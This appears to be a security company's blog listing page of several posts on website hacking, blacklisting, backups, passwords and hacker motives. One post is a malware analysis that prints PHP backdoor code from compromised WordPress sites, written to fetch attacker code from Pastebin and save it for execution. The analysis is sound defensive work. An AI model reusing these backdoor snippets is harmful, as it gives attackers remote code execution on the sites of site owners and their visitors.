Website Security: How Do Websites Get Hacked?

How-Websites-Get-Hacked

In 2014 the total number of websites on the internet reached 1 billion, today it’s hovering somewhere in the neighborhood of 944 million due to websites going inactive and it is expected to normalize again at 1 billion sometime in 2015. Let’s take a minute to absorb that number for a moment. Another surprising statistic is that Google, one of the most popular search engines in the world, quarantines approximately 10,000 websites a day via its Safe Browsing technology. From our own research, of the millions of websites that push through our scanning technology, we often see 2 – 5% of the them have some Indicator of Compromise (IoC) that signifies a hack. Granted, this might be a bit high, as the websites being scanned are often suspected of having an issue, so to be conservative we would extrapolate that to suggest about 1% of the total websites online are hacked or infected. To put that into perspective, we are talking somewhere in the neighborhood of 9 million websites that are currently hacked or infected.

With this sort of impact, it’s only natural that people are curious how websites keep getting hacked. The challenge however, is that the answer has been the same for quite some time.
Read More

How Social Media Blacklisting Happens

Social Media Blacklists

In today’s world, we are all browsing websites online and sharing content on a multitude of social media platforms every day. Worldwide social media users exceeded 2 billion back in August 2014, with an adoption rate unlike anything we have seen in history. Social media continues to grow around the world, with active user accounts now equating to roughly 29% of the world’s population. Monthly active user (MAU) figures for the most active social network in each country add up to almost 2.08 billion – a 12% increase since January 2014.

What is Social Media Blacklisting?

Legitimate links on social media platforms are sometimes hijacked by criminals to direct visitors to a website where malware will be automatically downloaded. The more that people share and use social media, the more often these situations will occur. This is why social media platforms have specific security measures to protect their users from being victims of malicious shared content.

In the same way that websites can be blacklisted by Google for having malware hosted on their pages, social media blacklisting occurs when security triggers detect malicious activity, thus placing the infected links on their internal blacklist. Sometimes they can match the URL with the help of an external blacklist authority, such as McAfee, Google, Web of Trust, or Websense.

Other Types of Blacklists

The initial reaction to hearing the term “blacklist” is to think that whoever is on the list is restricted from visiting a certain area or performing certain activities. In the case of websites and social media links, this means that that the content is labeled as dangerous to visitors. This could be due to spam or malware being served from its pages. Our team deals with this kind of thing every day, providing blacklist removal for website owners along with the complete malware cleanup and protection.

You may have encountered the term “blacklisting” in conjunction with email marketing. As a mass-email sender, your reputation and content choices can get your IP blacklisted by major email service providers. If they believe you are sending spam, or violating CAN-SPAM and similar legislation, it can be very difficult to recover from being blacklisted for email abuse.

Social media blacklisting is still a recent phenomenon. As criminals find new ways to use social media, we’ll see an evolution in the protection measures taken against them.

Facebook

In 2008, Facebook launched a security system called “the link shim” that checks the URL whenever a link is clicked to check the destination. If it is on a blacklist, then a warning pops up notifying the user he could be headed to a malicious website:

Facebook-SPAM-warning

Since the link shim checks URLs at click time as opposed to display time, Facebook can prevent users from accessing malicious content. In addition to its internal and external blacklists, Facebook uses advanced machine learning classifiers to check the authenticity of the sender as well as other inputs. Malicious URLs that have been sent over e-mail are also blocked since all links to non-facebook.com URLs in e-mail are rewritten to first go through the link shim.

The Facebook Security page provides constant updates. You can get the latest information about how to safely use your Facebook profile and pages, as well as a few techniques Facebook employs to protect users from being targets of malware sharing activities.

Although it is good to know that you’re protected by the social platform, offer your help by always reporting any suspicious links you may find on your timeline. This crowd-sourcing effort helps protect other users as well.

Twitter

The microblogging platform is often the target of malicious activity for a few reasons:

  • Tweets can be easily scheduled automatically by malicious or hacked user accounts.
  • With the rise of URL shortening, users are used to not seeing the full landing URL
  • Its explosion in global popularity.

Many users are tempted with a cleverly worded message, a photo, and a link. They click it without thinking.

Back in 2009, Twitter started using Google’s list of suspected phishing and malware pages to filter URLs. Along with Twitter’s own internal security mechanisms, the Google Safe Browsing API allows client applications to check URLs against an updated Google blacklist.

Once a website is blacklisted on Google, this is reported to Twitter’s platform and users are prevented from reaching the infected websites via Twitter.

If the URL of the site you manage is being blocked, and you are completely sure that your site is not being used for abuse on Twitter, you can contact the Twitter Support team. In the Problematic link field, insert the extended URL of the link you are having issues with, rather than a shortened version. You can find extensive information on Twitter’s Security measures on unsafe links here.

LinkedIn

Malware on LinkedIn often takes the form of phishing or spam campaigns. Malicious software, or “malware” refers to a variety of software created for the purpose of harming your computer. This harm can include disrupting your computer’s normal operations, like making it run slower, causing abrupt pop-ups, or stealing your personal information. Viruses are a particular form of malware that aim to spread from computer to computer with the intention of exploiting your computer’s data or deleting it.

LinkedIn is taking specific steps in protecting their users, as well as teaching them important aspects of online security. Here’s what they say:

  • We scan uploaded files for malware and viruses. If we identify an infected file or image, we will prevent the download from occurring and keep it from infecting your computer.
  • We include your full first and last name in the footer of all our messages, as well as your current professional headline so you can better identify legitimate LinkedIn communications. Any messages claiming to be from LinkedIn without our security footer should be discarded.
  • We will never ask you to download software from any of our messages, nor will we ask you to provide sensitive information such as a password or social security number via email.

Is Social Media Safe?

Any online membership website has its fair share of security risks and there’s always a potential of being infected with malware while browsing both websites and social media venues. We cannot say that any social platform is safer than a website or vice-versa.

But we can never stress enough the importance of having an informed and educated security posture online! Being informed means protecting yourself before allowing any attacker to start their attack.

Some Takeaways

  • Make sure you are aware of the risks before connecting to any major social media venue and creating a post. Each platform has security measures in place, and information for you to stay up-to-date with privacy and security issues. Read those pages, they are put together with the help of dedicated security analysts, using thousands of man hours, just to protect you.
  • Social media blacklisting is not something to be afraid of if you’re security conscious. That list is not meant to harm you or your business; it is there to protect you, so make sure you report any suspicious links or content using the specified methods for each social venue. Giving a helping hand is also helping yourself.
  • Want to check a suspicious bit.ly shortened link? Before you share it further, copy and paste the bit.ly link into your browser address bar, add a “+” after it and hit enter. The real target URL will reveal itself together with additional information about the link: when it was generated, who shared it, and where it was shared. So in the example of http://bit.ly/1PlZm6L, we would add “+”, thus creating http://bit.ly/1PlZm6L+. The real target URL in this case is https://blog.sucuri.net/2015/04/how-to-create-a-website-backup-strategy.html
  • Social media platforms leverage security experts that know a lot about security, and work with partners to expand their knowledge. If there is a warning that some content may be malicious, you should take the warning seriously.

Have you experienced any social media blacklisting on your website? Please do leave a comment detailing your experience. Let others learn from what you went through, in an effort to educate future users into being more careful and trust the systems put in place to protect them. Then go out there and share safely!

How To Create a Website Backup Strategy

wire-rope-59675_640

We’ve all heard it million times before – backups are important. Still, the reality is that even today, backups remain one of the most overlooked and under-utilized precautions we can take to protect our vital data.

Why are backups so important

Put simply, a good set of backups can save your website when absolutely everything else has gone wrong. If a malicious attacker decides they want to wipe all your site files, or if your web server has a catastrophic hard drive failure, all the damage can be easily undone by restoring from your backups. The idea is simple. In order to make sure our data is safe, you make a copy of it. If something happens to the original copy you can always use your backup copy.

Simple right? Unfortunately it isn’t that simple at all and there are a number of factors that determine whether your backups will be useful, practical and secure.

Read More

Why Website Reinfections Happen

why-does-your-website-keep-getting-reinfected

I joined Sucuri a little over a month ago. My job is actually the Social Media Specialist, but we have this process where regardless of your job you have to learn what website infections look like and more importantly, how to clean them. It’s this idea that no matter who you are, you must know the foundation that makes this company work. After a month of this training, I made some very interesting observations through my interactions with some of our clients and felt some might find it interesting. This might be new to some, and not so new to others, but for me it was fascinating and worth a share.

I will note that I was like many of you a month ago, I operated my own website, and still do, and came to know of Sucuri because my own website had been hacked. Such is the circle of life that I now work at this fascinating place. Here are some of my observations from my last month here and I hope they help someone.

1. Passwords

It is important to understand that whenever you create a website, even before you actually register your domain name, one thing should be at the top of your list: create a good password. Our friends at WPEngine put together a fascinating post unmasking the psychology behind passwords, if you have time, give it a once over. On that note, always use correctly generated passwords. Where?

Short answer: Everywhere passwords are required.

Longer explanation:

  • On your registrar account. We see many examples of domains being DNS-spoofed because the domain registrar account was hacked (see the recent Lenevo.com case).
  • On your website hosting account. There have been multiple instances where existing customers who are returning for another cleanup, on the same website, were still using the old credentials they had when they initially asked us to help them. Despite the fact that we always tell customers to change their passwords after a cleanup, many don’t follow our recommendations.
  • On your computer. Make sure you always set up your computer to use a username and password to log-on, never leave it unlocked when you step away from it and make sure you’re employing best practices with your passwords. Hackers are not always trying to directly connect to your website. Instead, they will try to use possibly damaged installations of softwares like FileZilla or Total Commander, to steal your FTP credentials and log into your website with the correct username and password, stolen from your computer.

Remember, employ complex, long and unique passwords at all times and do not use the same password across all your online profiles. Most importantly, if you’ve been infected and you get help getting it clean, update all your website passwords the minute it’s done.

2. Shared Environments

One of the biggest contributing factors to reinfections are shared environments. We’re not talking about shared versus dedicated hosting, instead we mean accounts that have multiple installations within them. Imagine a hosting account in which you install 10, 20, maybe 100 different CMS applications. These are considered soup kitchen servers, and they are ripe to be exploited.

What often happens is we forget what we’ve installed, and in the process leave the sites to their own demise. Over time, they become out of date and some, unfortunately, fall susceptible to a weaknesses like vulnerabilities. As with all the things on the internet, at some point one of those weaknesses is identified by the relentless bots crawling the web. Once identified, they get exploited. Once in the environment, via a method we call lead frogging (also known as cross-site contamination) they infect all neighboring sites, inevitably affecting your good website.

Where this plays a role is that often a website owner will clean the good website, assuming that is where the weakness is. Only to find out, after much troubleshooting that the weakness is actually in a neighboring site – leading to continuous reinfection cases.

Lesson?

Stop operating soup kitchen servers, if one website is infected on the server, assume they all are and get them all cleaned. If you can’t, then it might be time to do some spring cleaning.

3. Do Not Assume You Cannot Be a Target

If you’re thinking that your website is just a personal blog, school project, presentation website or small business services, and by definition that is not a target for hackers, you are wrong. I encourage you to read our recent post on Why Website Get Hacked as it’ll help provide perspective.

Most attacks are not targeted attacks. You’re just one part of the results from a script being targeted upon a large number of websites and servers, where the hackers are looking to find vulnerabilities for their next strike. Most of the time this is done with automated tools. They can find and infect your website in minutes.

Being hosted on the server where a targeted website is also hosted will cause problems to all websites hosted there, if the server is not correctly patched and secured/hardened.

4. Complex Structures

I can think of one case where I imagined the client having gone through this thought process:

  • Let’s setup a Joomla CMS to power the main website.
  • Then, let’s create a WordPress website inside the Joomla folder, and let’s call it ./wiki/ because we found a great wiki theme for WordPress and we will use it for that.
  • Add a subdomain subdomain1.maindomain.com and use it as a backup folder for the main site.

Now, we already see three possible problems due to the different types of platforms being used. The time and effort required to maintain this type of configuration is very time consuming. Be sure to account for this when deploying your configuration.

It’s easy, if you’re not very technical, to lose track of which files belong where, which CMS is up-to-date and which isn’t. Not all CMS applications are treated equally.

5. Learn the Basics of Your CMS

To avoid the mess above, start by learning the structure and names of the core files that come with the CMS of your choice. What does the original archive downloaded from the platform’s website contain? Memorize the files, their names and extensions.

Let’s look at WordPress for instance, we all love and use it, right? This is what a clean WordPress install folder looks like, when seen via my FTP client:

Core WordPress Files viewed in FTP program

Core WordPress Files viewed in FTP program

The wp-config.php file contains the information enabling WordPress to connect to the server and the database to store content and data. Attackers will create additional files or folders in your website, having similar names as the clean WordPress files. So paying attention to them will help you determine which files could potentially have been added by the intruder. Remember, wp-config.php is not the same as wp-configs.exe or config-wp.php.

Never feel inadequate or inferior for not knowing your way around a server or website dashboard. Always ask for professional help cleaning website hacks if you need it. Contrary to popular belief, website security is not a Do It Yourself (DIY) project.

6. Backups

Never store backups in a publicly accessible folder. Never have backups on the same physical location as the main website. Something will always happen and both the website and the backups folder you rely on could be deleted.

Make sure you are securely saving your website data on protected backup services, which will allow for easy data-retrieval in the event of an attack. There are many services available, we have one for existing clients, but you can find a number of them on the market. The biggest mistake we see are website owners never employing a backup service, when an infection is so bad that the attacker deletes existing code, it’s impossible to recover without a good backup.

You can see our full post on creating an effective website backup strategy for more information.

My Website Security Journey Continues

I hope these 6 tips help someone, they may feel foreign, but don’t worry, there is plenty of help available. Remember, there is no such thing as a 100% security solution. The difference is like getting sick and visiting the doctor. You can follow the prescribed treatment and take the pills, or say, “I don’t care about what this doctor thinks,” and continue to get sick again and again.

The same thing happens to websites. Untreated, uncleaned, not “medicated” correctly, can lead to the same problems reappearing. So be on the safe side, learn about your mistakes, correct your security habits, keep your system updated, use correctly configured security services and you’ll reduce your overall risk, helping you avoid becoming a recurring victim.

The Impacts of a Hacked Website

Today, with the proliferation of open-source technologies like WordPress, Joomla and other Content Management Systems (CMS) people around the world are able to quickly establish a virtual presence with little to no cost. In the process however, a lot is being lost in terms of what it means to own a website.

We are failing each other, we are not setting ourselves up for success. We are learning the hard way what large organizations already learned – being online is a responsibility and will eventually cost you something.

I recently shared a post talking to the motivations behind hacks. This post was important as it helped provide context and I encourage you to spend some time digesting the information. What it fails to do is what I want to focus on in this post.

What are the impacts of these hacks to your website? To your business?

The Effects of a Hacked Website

If you are a large organization, maybe you can quickly understand the impacts of a hack. Say you’re a Facebook? What would be the value for a hacker? I’d argue a couple of things come to mind quickly – you have what is known as Personal Identifiable Information (PII) – always a good thing, and you have the ability to abuse the largest network in the world and affect millions of users world wide. There are obviously a number of other motivations, but the point is the same. The objective[s] is clear and Facebook knows it, and so they invest heavily in its security. The impacts of such a breach could be devastating, think loss in ad revenue, loss in user adoption, etc… This is all common sense, right? It all just makes sense, but how does that translate to the rest of the online world? The 99% of us that don’t own Facebook-like properties?

When I speak to website owners, there is often a common trend with the responses I get:

I don’t sell anything or store any information, my website is fine.

or,

It’s just a basic little site, with static content.

This is not their fault. To a certain extent, they do have a point. When you think about it rationally, why would someone bother? Fortunately, in my last post I explained why they would. In those one though let’s talk about 4 potential impacts after a hack. Things you might be aware of, but honestly possibly things you haven’t given much thought to.

1. Be Mindful Of Your Audience

Maybe you write about puppies, or maybe have a website to provide your clients with assurances that you are real. Whatever the reason, something has driven you to publish something that you feel is of some interest to someone, and you’re likely right.

In doing so, you have identified a potential audience and as it is on the web. That audience will at some point find your website. Whether you are a local gym posting your gym hours, or maybe a local restaurant showing today’s specials. The subset of people that have found their way to your website expect and demand a safe experience, even if they’ve never uttered the words.

The easiest way to digest this point is to think of yourself. Think of the websites you might spend your days visiting. Now try to fathom your feelings if while visiting a website you lost your life savings. Try to think of what you would feel like if someone stole your identity.

Should we worry about giving your visitors a safe online experience?

2. Google Does Not Discriminate

Contrary to popular belief, Google does not discriminate. Even if you do not sell, you are likely trying to achieve something. If you’re not, then what are your reasons for publishing online? Establishing a voice, sharing an opinion, or having a presence? What webmasters are almost always worried about is something known as Search Engine Optimization (SEO), more importantly how you rank on the Search Engine Result Pages (SERP).

Safe Browsing shows people more than 5 million warnings per day for all sorts of malicious sites and unwanted software, and discovers more than 50,000 malware sites and more than 90,000 phishing sites every month. – Google

What if I told you that you could lose all the hard work you put in to gain that SEO ranking in minutes? What if I told you that after a blacklist it could take you months to regain your position on these SERPs? What if I told you that a Google Blacklist has the potential to kill almost 95%, if not more, of the traffic to your website?

3. Something Known as Brand Reputation

Regardless of your business, you have a brand. Whether you realize it or not, and regardless of the size of your audience, trust is an important piece of the puzzle. Many take this for granted, but it’s critical to the success of many businesses.

It can take years to build, and minutes to lose. A hacked website is notorious for destroying trust. Whether its a data breach or a drive by download that infects the visitors desktop. The result of either action, or one of many more nefarious acts, will almost always lead to the same thing – a loss of trust in your brand.

Are you okay with your audience losing trust in your brand?

4. Hacks Cost You More Than Money

I think it’s human nature to think, “This is not meant for me” or “I’ll just deal with it when it happens.” I can tell you though, from years of doing this work and countless engagements with website owners, the cost of a hack is always more than you can ever imagine. The response I always get is the same, “If I only knew it would be this painful.”

As a species, we are risk adverse when it comes to gains, but risk seeking when it comes to loss… – Bruce Schneider

When I say cost, it’s important to note that it goes far beyond money, although that can be crippling as well.

No, instead I am talking about things you will likely never appreciate until you experience it. Things like the emotional toll of not knowing what just happened. Things like the hours you will spend arguing with hosting providers, developers, security professionals; if they would all just understand how important it is to get back online. Things like the fear that you missed something in the clean up process, which only becomes worse if you did and suffer repeated reinfections. Things like the new fear of being online at all, of using technology as a whole. All this is exasperated by one simple thought, “Why didn’t I take precautions?”

As surreal as these sound, these are the real costs of a hack. The money is easy to account for, as a business you take that risk; the smaller a business, the more likely you are to take the risk, the larger you are, the more foolish it is to take the risk. It’s the non-monetary impact that catches everyone off guard.

Are you emotionally and mentally prepared for a hack? Is your business?

Accounting for Website Security Is Always a Challenge

When did running a business become so challenging? Trust me, I know the feeling. Everyday I ask myself the same thing. When will the expenses end? Purchase this tool, configure this feature, hire more people. It’s an endless cycle, yet a necessary one. As business owners it falls on our shoulders to make these decisions.

For me, there is nothing worse than getting caught with my pants down. This is exactly what I hear from our clients. No one ever told me I had to think about my websites security. No one ever told me this could impact my business.

I hope this post helps address those points. Leverage these insights to make a better decision. If you can honestly say that none of the four items mentioned above are of any value to your business, then I encourage you to continue with the status quo. If though, for whatever reason, they resonate, then maybe it’s a good time to start asking more engaging questions to your technical staff.

A question like, What do we do for the security of our website?

I’ll close the point with a note to developers / designers. Our clients depend on us as their trusted technologists, it’s on us to educate and communicate the realities of having an online presence. Let’s be sure to be doing our part by introducing realistic expectations during the initial engagement process: Yes, the website will require maintenance. Yes, security is something you will be responsible for. Yes, having a website is a responsibility.

– Your Trusted Security Team,

Tony

Why Websites Get Hacked

I spend a good amount of time engaging with website owners across a broad spectrum of businesses. Interestingly enough, unless I’m talking large enterprise, there is a common question that often comes up:

Why would anyone ever hack my website?

Depending on who you are, the answer to this can vary. Nonetheless, it often revolves around a few very finite explanations.

Automation is Key

Understand that the attacks affecting a large number of website owners in the prosumer category (a term I’m using to describe website owners in micro, small, and medium-sized businesses leveraging platforms like WordPress, Joomla and others) are predominantly automated. I wrote an article on the subject back in 2012, it’s important to revisit the subject as it’s still very relevant today.

The benefits of these automated attacks have not changed, they still provide the attackers the following benefits:

  • Mass Exposure
  • Reduces overhead
  • Tools for everyone regardless of skill
  • Dramatically increases the odds of success

It is not to say that these attacks are never manual, but for the mass majority, automated attacks are what we see during the initial phases of the attack sequence. When I say attack sequence, I am referring to the order of events an attacker takes to compromise an environment.

A very simple illustration of the sequence would look something like:

  1. Reconnaissance
  2. Identification
  3. Exploitation
  4. Sustainment

The attack sequence can have varying levels of complexity depending on the group of attackers. When working with everyday websites, the most effective way to affect the largest number of websites at any given time would be with the deployment of scripts and bots during steps one and two. Although not always a manual process, steps three and four often have a tendency to have more manual elements to them, although many can be automated as well. While thinking of how these attacks occur, it is important to note the two forms of attack categories; attack of opportunity and targeted attack.

Attack of Opportunity

Almost all prosumers fall within the realm of opportunistic attacks. Meaning that it is not any one individual that is intentionally trying to hack your website, but rather a coincidence. Something about your site was caught by the trailing net as they randomly crawl the web. It could have been something simple like having a plugin installed, or maybe displaying the version of a platform.

In our analyses, we have found that it takes about 30 – 45 days for a new website, with no content or audience, to be identified and added to a bot crawler. Once added, the attacks commence immediately without any real rhyme or reason. It can be any type of website, the only commonality is that it is connected to the web.

These crawlers then begin looking for identifying markers. Is the website running one of the popular CMS applications (i.e. WordPress, Joomla)? If so, is the website also running any exploitable software (i.e. software vulnerabilities or bugs in code)? If the answer is yes, then the site will be marked for the next phase of the attack, exploitation.

The sequence of events can happen in a matter of minutes, days or months. It is not a singular event, instead it occurs continuously, always scanning for changes or updates. It is automated, therefore, once your website is on the list it will just continue trying.

Targeted Attack

This is often reserved for the larger businesses, but not always. Think of the NBC hack in 2013, or the recent Forbes hack. There are many examples of these types of hacks lately, and it is apparent why they would be targeted. The level of effort it takes to gain entry into these environments is exponentially more difficult but the gains can be astronomical. That being said, a very common form of targeted attack can be seen in something known as a Denial of Service attack in which the attacker works to bring down the availability of your site – common between competing businesses.

With that in mind, targeted attacks are not always reserved for the big boys. They can be deployed against smaller sites, and can be driven by competition or pure boredom and the need for a challenge. These attacks can range from very simple to very complex.

Hacking Motivations and Drivers

Now that we have a better appreciation for the how, let’s turn our attention to the why. That is why you are reading this.

Economic Gains

The most obvious of the reasons is economic gain. This often manifests in attacks known as Drive-by-Downloads or Blackhat SEO campaigns. As you might imagine, these are attempts to make money from your audience.

A Drive-by-download is the act of deploying what is known as a payload (i.e. injecting your website with malware) and hoping to infect as many of your website visitors. Think of your mom or dad visiting your website and the next thing you know, they are calling you because they installed a fake piece of software like you recommended on your website, but this time their bank accounts were drained. Scary, but very real and very devastating.

Blackhat SEO spam campaigns are not as devastating, however, in many instances they can be more lucrative. This is the game of abusing your audience by directing them to pages that generate affiliate revenue. This is rampant in the pharmaceutical space, but has also extended to other industries like gambling, fashion and many others. What they do is inject links through your website, sometimes you see them, sometimes you won’t. On the contrary, when it comes to search engines like Google or Bing, they see everything and once those links make it onto the Search Engine Results Pages (SERPs) the attackers begin generating revenue from your audience.

System Resources

There is one motivator, the use of your resources, that many don’t talk about. When referring to resources, I am talking about things like bandwidth and physical server resources. I break this out as its own motivator, but it’s also a group under economic gain. The business of farming system resources is big business and a huge motivator for many cyber groups; they’re able to not only use it as part of their own networks, but build a leasing environment off your stack.

You have likely heard of large botnets and I have also referenced them above. Botnets are nothing more than interconnected systems across the net; they can be desktops, notebooks and even servers – similar to your webserver. They can be employed to perform tasks simultaneously. These can include Denial of Service Attacks, Brute Force Attacks, or even some of the automated attacks mentioned above.

These attacks that target your system resources are dangerous mainly because of their ability to attack without you, the website owner, even realizing it. You go about your day with no worries with your website appearing to be in good standing and with no complaints. Then one day out of the blue, your host shuts you down, your usage bill is through the roof or you receive a notice from the authorities about your hacking attempts.

Hacktivism

This motivator is perhaps the one that’s the hardest to contend with when it comes to getting your head around it. Similar to others, the drivers for these attacks are monetary or abusive. However, they are more finding a way to protest around a religious or political agenda or to show off to peers within the hacking community.

A very common form of this can be identified with Defacements. The point of these attacks often comes down to some form of awareness. This form of attack can be combined with others, but in our experience often are somewhat benign and create more embarrassment to the site owner rather than affecting their users.

Pure Boredom

Something that always catches folks off guard is the idea of people attacking website out of boredom and amusement, but it’s very true. It’s unfair to say they are always young, but a good percentage of the time they are teens bored at home.

There really isn’t much to say about this, other than, put your kids into sports!!

Good Security Begins with Good Posture

It’s easy to feel overwhelmed by some of this information, but it is our belief that the best tool you have at your disposal as a website owner is knowledge. Driving your head into the proverbial sand does not make these things disappear; it simply amplifies the impact if and when any of these attacks affect you directly. I assure you they happen more often than note, and Google agrees they blacklist close to 10,000 sites a day for malware and flag over 20,000 sites for phishing every month.

Bruce Schneider likes to say:

As a species, we are risk averse when it comes to gains, but risk seeking when it comes to loss.

It is a very true and very sad sentiment that I have to agree with. It becomes evident when I speak with website owners and they say, “I have had a website for 10 years, never been hacked, I don’t need to worry about it.” Those also always make for the most interesting and painful conversations when the hack does occur. Some go as far to accuse us, “I was fine then I hear you speak, or read your post.” A bit over the top, I agree, but it gives you a very small window in the state of mind once the hack does happen.

I like to think of website security in the form of posture. It is through good posture that you position yourself for success. I take this from my Brazilian Jiu-jitsu training, where it’s through posture that you can help prevent positions that would see you in a lot of pain.

Remember, security is not about risk elimination, but rather risk reduction. You have heard this time and time again, risk will never be zero. You can, however, employ tools and steps to reduce it where you can so as not to become part of the statistic.

The Dynamics of Passwords

passwords

How often do you think about the passwords you’re using? Not only for your website, but also for everything else you do on the internet on a daily basis? Are you re-using any of the same passwords to make it easier to remember them?

We see it all too often: weak passwords used to secure website login for FTP, database, cPanel, and the CMS dashboard. Everyone has their own password policy. It’s very personal and usually based on a set of assumptions about online security. Many users choose policies of efficiency over security. Even the paranoid among us have to confront the truth. Like any defensive measure, best practices in password management can only minimize the level of risk.

Password management is a choice, and a habit. By taking a good look at the risks, users can make informed decisions and put better passwords into practice.

History of the Strong Password

Most password strength meters are too soft. The companies that use them know this, but they don’t want users to leave the registration process due to a restrictive password policy. Modern software can guess many so-called “strong” passwords in minutes, and the most common passwords in milliseconds. As password hacking grew in complexity over time, so did the requirements on passwords.


Read More

Creative Evasion Technique Against Website Firewalls

During one of our recent in-house Capture The Flag (CTF) events, I was playing with the idea of what could be done with Non-Breaking Spaces. I really wanted to win and surely there had to be a way through the existing evasion controls.

This post is going to be a bit code-heavy for most end-users, but if you choose to read you’re bound to find it very insightful.


Read More

Website Backdoors Leverage the Pastebin Service

We continue our series of posts about hacker attacks that exploit a vulnerability in older versions of the popular RevSlider plugin. In this post we’ll show you a different backdoor variant that abuses the legitimate Pastebin.com service for hosting malicious files.

Here’s the backdoor code:

if(array_keys($_GET)[0] == 'up'){
$content = file_get_contents("http://pastebin . com/raw.php?i=JK5r7NyS");
if($content){unlink('evex.php');
$fh2 = fopen("evex.php", 'a');
fwrite($fh2,$content);
fclose($fh2);
}}else{print "test";}

It’s more or less a typical backdoor. It downloads malicious code from a remote server and saves it in a file on a compromised site, making it available for execution. What makes this backdoor interesting is the choice of the remote server. It’s not being hosted on a hackers’ own site, not even a compromised site — now it’s Pastebin.com — the most popular web application for sharing code snippets.

Technically, the criminals used Pastebin for what it was built for – to share code snippets. The only catch is that the code is malicious, and it is used in illegal activity (hacking) directly off of the Pastebin website. Pastebin.com allows users to download the code in “raw” format (i.e. no HTML, no site UI, just the code — note the raw.php part of the URL). This means the hacker can save the PHP backdoor shell on Pastebin and link to it from your website.

Here’s an example of a slightly more elaborate backdoor, uploaded via the RevSlider hole:

Decoded backdoor that uses pastebin

Code-downloading backdoor from Pastebin

In the screenshot, you can see that this code injects content of the Base64-encoded $temp variable at the top of the WordPress core wp-links-opml.php file. You can see the decoded $temp content below:

Code-downloading backdoor from pastebin

Decoded backdoor that uses pastebin

Again, you can see that some code is being downloaded from Pastebin.com, saved to a file and immediately executed. This time this only happens when the attacker provides the Pastebin snippet ID in the wp_nonce_once request parameter (which is also used as a file name when they save the downloaded code). The use of the wp_nonce_once parameter hides the URL of malicious pastes (which makes it difficult to block) and at the same time adds flexibility to the backdoor — now it can download and execute any Pastebin.com snippet — even those that don’t exist at the time of injection — you just need to pass their ID’s in the request to wp-links-opml.php.

FathurFreakz encoder

I should also mention that Indonesian hackers have an encoder that was made specifically to work with Pastebin.com. It is called PHP Encryptor by Yogyakarta Black Hat or by FathurFreakz. Basically, they create a paste of their PHP code on Pastebin.com and then specify the URL of the code in the encryptor, which then generates obfuscated code that looks like this:

Encoded specifically for Pastebin

Encoded specifically for Pastebin

If you decode it, you’ll see this:

function FathurFreakz($ct3){
xcurl('http://pastebin.com/download.php?i='.code($ct3));
}
FathurFreakz(CODE);

This code downloads and executes a Pastebin.com paste (xcurl function) with the ID encrypted in the CODE constant. Here, you can see that they use one more special Pastebin.com URL type, download.php, which acts similarly to raw.php, but also provides HTTP headers to prevent browsers from displaying the content to download it as a file instead.

By the way, that hacker group likes using Pastebin.com so much that some of their backdoors look like this (decoded):

Pastebin malware decoded

Pastebin backdoor decoded

Hackers and Pastebin

Pastebin has a long history of being used by hackers of all ranks. Many hacker groups share data stolen from famous companies via the service. Pastes are being used as an anonymous intermediary storage for data stolen from user computers. Some pastes are known to be used in malware attacks – they may contain encrypted addresses and even base64-encoded malicious binary code. Here’s just a few notable headlines from the last 5 years:

This time we see relatively massive use of Pastebin in live attacks, which is quite new to us. This also suggests that we, security researchers, should be more careful when sharing malicious code we find in public pastes – it is easy for hackers to reuse them directly from Pastebin.com. It would be a good idea, before sharing, to make some obvious modification to the code that would prevent its execution when downloaded in a raw format.

2014 Website Defacements

When a website has been defaced, it is often the most visual and obvious hack that a website can suffer from. They also come parceled with their own exquisite sense of dread. Nothing gives that gut-wrenching feeling of “I’ve been hacked” more than seeing this on your home page:

Defaced-Website-Upgrade-Security

Most malware that we see on a daily basis is driven by some desire to profit off of victims – classic pharma spam or theft of credit card details and personal information.

By contrast, most defacements have little to no financial incentive. They are almost always done to further some political, religious or ideological goal. It may appear as though the websites are defaced by Anonymous or groups like the Syrian Electronic Army. The FBI even warned about ISIS hackers defacing WordPress websites. Some attackers will try to deface as many sites as possible with their ‘calling card’ just to prove how “l33t” (elite) they are, or to give attention to whatever cause they are trumpeting.

These hacks remind me of by-gone days when computer hacking was done primarily for mischief and trouble-making and less associated with the nefarious criminal underworld. We also see school websites defaced on a regular basis by students. Don’t underestimate the number of bored kids who are learning how to hack.

A lot of the time all that is tampered with is the site’s index.php file which can easily be restored by downloading a fresh copy of whatever CMS you use. A more nasty defacement, though, will overwrite something like your WordPress wp-config.php file entirely… and if you don’t have a backup, well, make one right now for a rainy day. :)

Now, having said all this, while all website defacements are primarily about the shock value much of the time they are coupled with malware, too. If this ever happens to your site assume it is fully compromised and act accordingly. Whoever defaces a site will almost certainly place a few backdoors for easy access later on. The more harmful hacks will also attempt to infect end user computers visiting the site.

For this reason, if you ever suffer from this sort of calamity make sure you perform a thorough check for any malicious files! Otherwise you’ll likely end up with the same problem soon after.

There are a whole bunch of ways that this can happen – websites that employ poor password management and/or use out of date software are easy, low-hanging fruit for these vandalists. Naturally, our clients using our CloudProxy firewall are protected against such attacks.